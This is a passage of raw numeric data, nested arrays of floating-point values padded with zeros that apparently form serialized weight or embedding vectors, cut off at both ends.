0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.2083, 0.835133, -0.151215, 1.15162, 0.221574, 0.108233, 0.065131, 0.145465, 0.63193, 0.108889, 0.508279, -0.269129, -0.198187, 0.172319, 0.325839, 0.0612855, -0.635311, -0.435558, 0.590671, 0.0923703, -0.009911, -0.227569, -0.39122, 0.0431908, -0.0457549, 0.200247, 0.127429, -0.326969, 0.594883, -0.412727, 0.178482, 0.00578636, -0.661192, 0.0103202, -0.110329, 0.54206, 0.158893, 0.466656, -0.270218, -0.22388, -0.0313375, -0.238189, -0.399878, 0.728962, 0.109875, -0.51882, 0.28044, 0.365676, 1.3629, -0.138101, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.10533, 0.278798, -1.34995, -0.0696007, 0.754957, 2.57716, 0.0865201, 0.511288, -0.0577744, -0.10405, -0.423933, -0.213807, 0.0263156, 3.1673, 0.705454, 0.156442, 0.115742, 0.889692, 0.0485605, -0.329414, -7.39524, -0.587756, 0.679489, 0.404011, 0.0353466, -1.80159, -0.395659, 0.197522, -0.288667, -0.830536, 0.318075, -0.818103, -0.743075, 0.368427, 0.023399, 0.407831, -1.04199, 0.483819, 0.0828921, 0.35722, -1.50174, -0.196254, 0.725435, 0.222741, 0.0339974, -0.583928, 0.0931427, 0.328158, 0.823124, 0.0510477, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0180697, -0.120998, -0.193342, 0.85779, -1.75996, -0.145697, 2.56764, 0.782773, 0.450378, -0.0982587, -0.1247, -0.72638, -0.732309, 0.153515, -0.0326798, 0.0859862, -0.569807, 0.394019, 0.117462, 0.251221, 0.845853, 0.847721, 0.421144, 0.573381, 0.025097, -0.17079, -0.127728, 0.00831425, 0.0787938, 2.577, -1.29938, 0.691162, -3.32454, -1.35713, -2.20211, 0.392762, 0.373119, 0.280267, -0.610076, 0.103084, -0.277629, 1.42858, 0.473211, -0.673607, 1.21082, -1.35457, 0.101984, -1.70226, 1.08811, -0.812626, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.234612, -0.00865116, 0.0404159, 0.25135, 0.655618, -0.187835, -0.628119, 0.518079, -0.39667, -0.78942, 0.175555, -0.392038, 0.277756, -1.05727, 0.526056, 0.510797, -0.106047, -1.67583, 1.80736, -0.23395, 0.701526, -0.541358, 0.105999, -0.167828, -0.029229, 1.14975, -0.15965, -0.227614, -0.135554, 1.56454, 0.780779, -0.724606, -0.593993, -0.998891, 0.0919827, 0.450594, -0.538901, 0.547649, -0.313118, -0.104741, 0.410557, 0.751659, 0.494966, -0.858162, -0.238985, -0.239199, 0.423537, -0.273949, 0.223215, -0.129985, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00582788, 0.0164447, -0.0498632, -0.0581705, 0.0244792, 0.0157947, -0.035586, 0.00395222, -0.0216416, 0.0112976, 0.0100584, -0.0641057, 0.0240168, 0.00582842, -0.0351634, 0.0137765, -0.042078, -0.0348972, -0.0375012, -0.0257387, -0.0546805, -0.0358484, 0.00208489, -0.0363354, 0.0247895, 0.0334971, 0.0216527, 0.0198412, -0.0471676, -0.0070608, -0.00930937, -0.0494431, -0.0618612, 0.0300086, -0.0300961, 0.0139052, -0.0482571, -0.00451284, -0.0189375, 0.040227, 0.018182, 0.0375883, -0.0270563, 0.0337168, -0.0198271, -0.0165858, 0.0209145, -0.0422434, -0.0260662, -0.024986, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.280057, 0.377801, -0.441952, -1.27845, -0.298068, 1.28171, -0.54256, -0.346468, 0.275764, 0.525215, -0.295772, -0.582597, 0.166079, 0.162596, 0.390477, 0.161276, 0.0451447, -0.126315, -1.20241, 0.563122, 0.410249, -1.77284, -0.219624, -0.124339, 0.00454759, 0.100602, -0.52095, 0.0338173, -0.29227, 0.167408, -0.339629, 0.423217, 1.01269, 0.783648, -0.331597, -0.63313, 0.0739286, 0.952432, 0.24188, -0.277457, 0.453979, -0.0781443, 0.49036, -0.146128, -0.836312, -0.799947, -0.0445305, -0.0592702, -0.523676, 0.513579, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.108762, -0.024273, 0.439208, 0.650574, 0.196522, -0.838404, 0.121426, 1.17039, 0.232818, 0.304609, -0.535919, -1.06514, 0.869641, 0.496056, 0.154152, 0.0577726, 0.088973, 0.488296, -0.707301, -0.0893437, -4.56395, 0.174036, -0.211087, -0.479564, -0.0084636, 1.23712, 0.29091, 0.0513551, 0.397437, 0.263076, -0.862292, -0.06082, 0.580493, 0.320663, -0.783696, 0.366165, -0.0244925, -0.0981926, 0.57451, -0.5968, 0.589238, -0.704496, -0.560862, -0.0839649, 0.0147986, 0.143185, -0.112592, 0.11569, 0.0241843, 0.00782381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0876624, 0.600703, -0.393411, 1.05088, 0.260039, -0.138641, 0.319135, -0.597047, -0.705588, 0.61651, -4.616, 0.272411, 0.43197, -0.157418, -0.328696, 0.519095, -0.874161, -0.095202, 1.0002, -0.296085, -0.176376, -0.244104, 0.401531, -0.950305, 0.0173988, -1.43802, 1.33824, 0.15364, -0.457963, 0.947199, -1.31592, 0.279487, -0.773742, 0.822072, -1.33803, -0.567244, 0.453384, 0.250774, 0.429138, 0.223368, 1.01085, -0.984222, 0.231651, 0.17955, -0.307755, 0.497636, 0.384138, -0.142933, -0.480406, -1.6058, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.262059, 0.661248, -0.425415, 0.988594, -0.263324, -0.0854719, 0.727248, 0.0519006, -0.041103, 1.03413, 2.94721, -0.602879, 0.664402, 1.78682, -1.78073, 0.442521, -0.194133, 0.621769, 0.388468, -0.0222371, 0.0464028, 0.726418, 0.431174, -1.12577, -0.016403, -0.431634, -0.713739, 0.768949, -0.180023, 2.37554, -1.70709, 0.466608, 0.957275, 1.54362, -1.45329, -0.721497, 0.316534, -0.604271, 1.53063, -0.503255, -0.104254, 0.715042, 0.491117, 0.0150418, 0.152789, 0.163822, 0.665924, -1.19095, -0.536305, -0.65288, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.667995, -0.0202133, -0.43026, -0.598796, 0.353495, -0.464602, -0.12008, -0.0441756, 0.161297, 1.19578, 0.163675, 0.239733, 0.460481, 1.54292, 0.590185, 0.55305, 0.0333647, 1.09549, -0.182515, 0.173915, -2.19077, 0.226521, 0.262419, 0.995612, 0.04174, 0.525167, -0.44444, -0.292628, -0.197206, -0.460871, -0.452132, -0.261302, 0.226308, -0.247908, -0.158471, 0.386675, -1.02155, 0.247639, 0.261188, 0.26775, -0.367003, -0.302024, -1.06073, 0.255533, 0.147995, -0.0131401, 0.216371, 0.66427, 0.647565, -0.0201, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.522074, -0.392761, 0.290612, -0.102772, 0.71297, -2.28415, 1.42424, 0.441092, 0.297105, -0.119794, -0.675246, 0.132939, 0.143614, -0.00590757, 0.319779, 0.628752, 0.504229, 0.807083, -1.6953, -2.90579, 0.0504308, 0.66254, -0.822735, 0.309652, 0.0441201, 0.703183, 0.173302, -0.0732583, 1.27966, 0.157619, 0.00391756, 0.242925, -0.164199, -1.02042, -0.0541494, -2.3978, 0.0937846, -0.275557, -0.488527, 1.01718, -0.322546, -0.431858, -0.544703, -1.18591, -0.646282, -0.35296, 1.00002, 0.702456, 0.410456, 0.0614669, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.295839, 0.48749, -0.250767, -0.797391, -0.232384, 0.418462, 0.387235, 0.960061, -0.191897, 1.04525, -0.651756, -0.279784, 0.716194, 0.342236, 0.829823, 0.148468, -0.113137, -0.446995, -0.301331, 0.113571, -0.0545101, -0.26255, -1.23184, 0.184642, -0.0426401, 1.19245, -0.433336, 0.0757407, 0.665245, -0.397853, 0.237394, -0.469161, -0.626106, 0.141971, -0.167829, 0.275424, -0.758347, 0.509359, -0.218216, -0.662873, -0.0595916, -0.0270402, 0.524964, -0.2321, -0.000389608, 0.135245, -0.461896, 0.998813, -0.303257, 0.0264833, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0597724, -0.18151, 0.234351, 1.16461, 0.0971876, 0.214008, 0.209933, 0.32958, -0.668421, 0.293814, -0.988543, -0.289137, 0.152218, -0.327873, -1.00006, 0.00650972, 0.541077, 0.409312, -1.00315, -0.668993, -0.0659849, 0.314336, -0.355661, -0.0508591, 0.0379435, 0.500943, -0.110721, 0.474046, 0.144216, -0.687312, -0.477, 0.435318, 0.571804, 1.82638, -0.929956, -0.118372, -0.349745, 0.194177, 1.54933, 0.0245301, -0.184153, 0.293282, -0.097109, -0.0632774, 0.22744, 0.872606, -0.601146, -0.985058, -0.616452, -0.730357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.225581, -0.13455, 2.60395, -0.27982, -0.0326815, 2.94465, -0.379955, 1.06743, 0.257016, -0.246081, 0.00626051, 1.00429, 0.444224, 1.98882, 0.456873, 0.101207, 0.291307, 0.482486, 0.0628707, -0.634902, -0.857219, 0.034626, -0.656198, -0.154894, 0.0263009, -0.083885, 0.312576, -0.403916, 0.192752, 1.17637, -0.446298, 1.14046, -0.422477, 0.441757, -0.175056, 0.237513, 0.362371, -1.0839, 0.791569, -0.288636, 0.15232, 0.16571, -5.58503, -0.292178, -0.609799, 0.00359772, 0.059814, 0.337497, -0.0456116, -0.0515602, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0766084, 0.120952, 0.159317, -0.376492, -0.0740785, -0.827363, -0.577585, -0.341195, 0.202595, 0.209397, 0.0713967, 0.221236, 0.267677, -0.277037, -0.0728074, -0.121906, 0.380108, 0.687495, -0.85154, 0.148517, 0.243052, -0.186309, -0.268694, 0.137717, -0.0112855, -0.291454, -0.0438027, -0.138478, 0.347759, 0.00719136, -0.342292, -0.678048, -0.810642, 0.224682, 0.28376, 0.240818, 0.368557, 0.166734, -0.584406, -0.118577, -0.550049, 0.213712, 0.406012, 0.633921, 0.0375635, -0.214717, -0.448754, 0.853068, 0.368057, -0.234969, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0053438, -0.00537545, -0.184408, -0.142157, -0.416168, 0.363014, 0.345105, 0.296037, -0.124654, 0.322052, -0.235292, -0.0980614, 0.409397, -0.0497859, -0.375388, -0.250969, -0.0981585, 0.0722905, 0.540131, 0.266987, 0.31857, 0.389736, -0.00587657, -0.537369, 0.0225036, 0.145929, 0.456102, 0.435384, -0.420618, -0.904436, -0.137007, -0.532021, 0.0903367, -0.104481, 0.0678861, -0.0540483, -0.540282, 0.518167, -0.00479564, -0.0079926, 0.467129, 0.00156733, 0.349694, -0.180226, -0.296438, -0.424088, 0.635508, -0.604676, 0.209662, -0.30263, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.316588, 0.941569, 0.342191, -0.728312, 1.44769, 1.59755, 0.378296, -2.48756, 1.75363, 1.64103, 0.651603, 0.895939, 1.0602, 0.332887, -0.38988, -1.51751, 0.195401, 0.0682005, 0.572131, 0.35714, -0.176745, -0.0618688, -0.512659, -1.00565, -0.0173481, 0.793942, 1.57766, 0.70586, -1.05442, 1.96552, 0.0225863, 0.306499, -0.389977, 0.0613327, -0.123246, 0.201544, -0.514118, 0.357744, -1.03978, -2.52856, -0.826274, -0.196177, 1.85538, 0.243761, -0.836826, -1.63097, 0.52689, -1.88275, 0.966183, -0.630417, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.317647, -0.319918, -0.711323, 1.59191, 0.0841627, 1.87923, 1.01007, 0.789384, 0.503349, 0.548707, 0.615919, 0.395558, -0.697982, -0.267981, -2.10715, 0.0295865, 0.139486, -0.501845, 5.97106, -0.0728299, 0.334278, 0.252699, -0.277681, -0.273976, -0.0213905, 0.580596, -0.841813, -0.0293286, 0.0777785, -1.38661, -2.26683, 0.869926, 0.979455, 0.852165, -0.751046, -1.04523, 0.183031, -0.0672466, 1.70925, -0.0695859, 0.628563, -0.652828, -1.73043, -0.954673, -0.0561551, 0.879025, 0.634687, -1.52376, 0.625199, -0.0810672, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0386614, 0.0300274, -0.0406126, 0.0106733, -0.0154052, 0.0442192, 0.019789, -0.0104466, -0.0295513, -0.000415195, -0.0114132, -0.033954, 0.00967678, 0.0219783, -0.0582937, 0.0227223, 0.0164509, -0.028801, -0.0246728, 0.0300411, 0.0194892, -0.00242723, -0.0388959, -0.0476972, 0.0300196, -0.0141949, -0.00170786, 0.0337114, -0.00534261, -0.0399127, -0.0209442, -0.0418985, 0.0235862, -0.0160574, -0.0107141, 0.00116523, -0.0192918, -0.0132972, 0.0290592, 0.0237985, 0.025187, -0.00845821, -0.0390293, -0.0494291, -0.0308208, -0.0264815, -0.0119143, -0.0404856, 0.00349375, -0.000253465, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0442498, -0.022406, 0.0395571, 0.0281488, 0.0075683, 0.0148697, 0.0382801, -0.0241124, 0.0136336, 0.0269792, 0.0396601, -0.0236657, -0.0239268, 0.0400947, -0.0536841, 0.0164122, -0.0389649, 0.0311577, 0.00923819, -0.0169541, -0.0213906, -0.0342286, -0.0389736, -0.0228373, 0.00149021, -0.046021, -0.0419726, -0.0280963, 0.0271984, -0.0504214, -0.050382, -0.027526, 0.0235949, -0.00305105, 0.0223165, -0.0284985, -0.0536751, 0.00979007, 0.0400998, -0.0218434, 0.0310683, -0.0094176, 0.0199976, -0.0312057, -0.0154904, -0.0238395, 0.0388896, -0.00914617, -0.0505772, -0.0207484, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0617362, 0.196832, 0.775808, -0.548274, 0.713229, -0.943687, -0.826375, 1.35313, -0.392385, -0.373778, 0.391178, 1.71131, 0.177278, 0.111293, -0.296716, 0.408424, -0.550011, -0.506212, -0.698154, -0.920523, -0.804038, 0.347287, 0.492696, -0.390561, 0.0203369, 1.91853, 1.70492, -2.44196, 0.32648, 2.3785, -0.926582, 0.274002, -0.0613919, -0.175036, -0.387735, 0.0123933, 1.69013, -0.550539, 0.252672, 0.19425, -1.71223, -2.07596, -2.51066, -0.63738, 0.384115, -1.56875, -0.431412, 1.4898, 1.45973, 0.288254, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0694637, 0.234293, -0.0384624, 1.88544, 0.0263936, -0.140758, -0.294075, 0.650119, 0.187138, 1.05286, -0.392044, -0.0288931, 0.293739, -0.00315151, 0.0119241, -0.0580794, -0.175109, 0.153388, -0.237627, 0.218168, 0.107495, -0.0854477, 0.0282669, 0.067632, 0.00419083, 0.168374, 0.0515999, -0.215841, -0.163693, 0.340874, -3.03106, 0.0374973, 0.236892, 2.03238, -1.2932, -0.17107, -0.0947622, 0.108934, 2.77119, 0.0231219, 0.162733, 0.0227226, -0.0355209, 0.191682, -0.00959096, 0.878061, 0.139756, -0.38492, 0.97516, 0.0428244, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0956433, 0.434045, -0.112437, 1.01573, 0.210701, -0.662638, -1.03677, 1.21557, 0.21533, 0.199962, 0.157218, -0.175469, 0.307791, 0.295498, 0.424079, -0.701214, 0.00620567, -0.0681584, 0.359171, 0.956768, 0.239628, 0.180519, 0.0732215, 0.0870791, -0.0214856, -0.00860337, 0.175838, -1.1067, 0.713413, 1.05371, -1.61344, 0.253375, 1.10626, 1.82714, -2.09182, 0.524782, 0.0983768, 0.600907, 1.90327, -0.0871044, -0.246973, -0.706184, 0.0576315, 0.291424, -0.0198773, 0.940403, 0.322904, -0.902529, 1.04154, 0.479672, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.189924, 0.0260059, -0.267103, 0.770939, -0.907456, -1.08298, -0.132564, -0.0595572, -0.379226, -0.176419, 0.132885, 0.0235959, -0.427154, 0.0412024, -1.24642, 0.69487, -0.186457, 0.787567, 0.301205, 0.487338, 0.198397, -1.17986, 0.409079, -0.166769, 0.00472508, 0.462992, 0.0402926, 0.103018, 0.278331, 0.0787222, 0.747431, -1.4341, -0.0304184, 0.0212685, 0.12661, -0.500546, 0.0765586, 1.74537, -0.112925, -0.0576047, 0.283635, 0.00636282, 1.30834, 0.643967, -0.24999, 0.59964, -0.205021, 0.104004, -0.600384, -0.000155705, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.695974, -0.129607, 0.600306, 0.304015, 0.564409, 1.6221, -0.286626, 0.89651, -0.370437, 0.0783919, -0.156796, 0.0115489, -0.546074, -0.31387, 0.423087, 0.440643, 0.196042, 0.0763858, 1.04211, 0.434497, 1.10865, 1.14416, -0.33845, 0.697608, -0.0430303, -0.160625, 0.175219, -0.219286, 0.138402, -0.532377, 0.491973, 0.280262, -0.0919107, -0.977611, -0.144309, 1.32977, 0.928962, -0.264523, -0.325696, 0.0506461, -0.0671854, 0.92042, 1.52524, -0.0115185, 1.23646, 0.383555, 1.1147, -1.21328, -0.233483, 0.260875, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.889581, 0.42773, 0.102021, -0.0690815, -0.50109, 0.0994008, 0.0777038, 0.355447, 0.122223, -0.330119, -0.418854, 0.105862, -0.396614, -0.35208, -1.00883, -0.646376, -0.14375, -5.94317, 6.3626, 0.767676, 1.06944, -0.0252855, -0.545631, 0.382134, -0.0321749, -0.35443, 0.0832172, 0.226229, -3.45264, -0.811095, -0.00266894, -0.437992, 0.298922, -0.260096, -0.064719, -0.421387, 0.264886, 0.188394, -0.536335, -0.0919568, 0.344194, 0.239629, 0.156315, 0.288174, 0.0615565, -0.332355, -0.227838, -0.96906, 0.339535, 0.0669412, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.312797, 0.520245, -0.247811, 0.60606, -0.308867, 0.0390312, 0.385516, 0.228354, 0.333615, -0.607636, -0.725812, -0.511116, -1.2652, 0.0569628, 0.847665, -0.195323, -2.17945, 0.445048, 0.272476, -0.00239627, 0.878727, -0.30221, 0.0928734, -0.0238151, 0.0143469, -0.365801, -0.122928, 0.354199, 0.106878, 1.15028, 0.348079, 0.274576, -0.61538, 0.747706, -0.110295, 0.404983, -0.472655, -0.00626858, -1.05629, -0.332901, -0.336936, 0.302657, 1.45289, 0.861287, 0.241594, -1.39795, -0.689364, 0.171802, -0.612382, 